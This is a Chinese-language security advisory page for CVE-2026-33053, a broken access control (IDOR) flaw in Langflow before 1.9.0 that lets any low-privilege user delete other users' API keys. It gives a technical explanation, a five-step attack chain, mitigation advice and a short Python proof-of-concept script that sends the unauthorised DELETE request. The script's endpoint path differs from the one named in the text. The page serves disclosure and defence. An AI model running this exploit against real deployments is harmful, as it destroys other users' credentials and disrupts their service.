IPBUF安全漏洞报告
English
CVE-2026-33053 CVSS 8.8 高危

CVE-2026-33053 Langflow API密钥越权删除漏洞

披露日期: 2026-03-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33053
漏洞类型
访问控制失效
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Langflow

相关标签

IDOR权限提升访问控制失效LangflowCVE-2026-33053

漏洞概述

Langflow 1.9.0之前版本存在严重的访问控制失效漏洞。由于delete_api_key CRUD函数在执行删除操作时,未校验API密钥归属,攻击者可利用delete_api_key_route端点,在仅通过低权限认证的情况下,越权删除系统中任意用户的API密钥,造成严重的机密性、完整性及可用性风险。

技术细节

该漏洞属于典型的IDOR(不安全的直接对象引用)漏洞。在Langflow受影响版本的实现中,DELETE /api-keys/{api_key_id} 端点虽然通过依赖项 get_current_active_user 进行了通用的身份认证,确保请求者是已注册用户,但在核心的 delete_api_key() 数据库操作函数中,严重缺失了关键的所有权校验逻辑。系统未验证传入的 api_key_id 是否属于当前发起请求的用户 ID,直接执行了删除指令。因此,攻击者只需利用一个合法的低权限账户,通过修改请求参数中的目标 ID,即可绕过权限限制,成功删除系统中任意用户的 API 密钥,导致严重的业务中断和数据泄露风险。

攻击链分析

STEP 1
信息收集
攻击者注册或获取一个低权限账户的有效认证令牌(JWT),并尝试获取或猜测目标用户的API密钥ID。
STEP 2
构造请求
攻击者构造一个HTTP DELETE请求,目标端点为删除API密钥的接口,路径参数中填入受害者的api_key_id,头部携带攻击者自己的认证令牌。
STEP 3
身份验证
服务器接收请求,通过get_current_active_user依赖项验证令牌有效性,确认请求者已登录。
STEP 4
权限绕过
服务器调用delete_api_key函数,由于缺乏所有权校验,系统未检查api_key_id是否属于当前用户,直接执行删除操作。
STEP 5
完成攻击
受害者的API密钥被成功删除,导致其无法访问相关服务或数据,机密性和完整性受到破坏。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Configuration target_url = "http://localhost:3000" attacker_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." # Valid JWT token for low-privilege user victim_api_key_id = "uuid-of-victims-api-key" headers = { "Authorization": f"Bearer {attacker_token}", "Content-Type": "application/json" } # Exploit: Send DELETE request to remove victim's API key # The server checks if the token is valid (Authentication) but fails to check # if the api_key_id belongs to the user making the request (Authorization) try: response = requests.delete( f"{target_url}/api/v1/keys/{victim_api_key_id}", headers=headers ) if response.status_code == 200: print(f"[+] Success: API key {victim_api_key_id} has been deleted.") else: print(f"[-] Failed: Status code {response.status_code}") print(response.text) except Exception as e: print(f"Error: {e}")

影响范围

Langflow < 1.9.0

防御指南

临时缓解措施
建议立即将Langflow升级至1.9.0或更高版本。如暂时无法升级,应严格限制API密钥管理接口的网络访问权限(如通过IP白名单),并启用详细日志监控,以便及时发现异常的删除操作。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表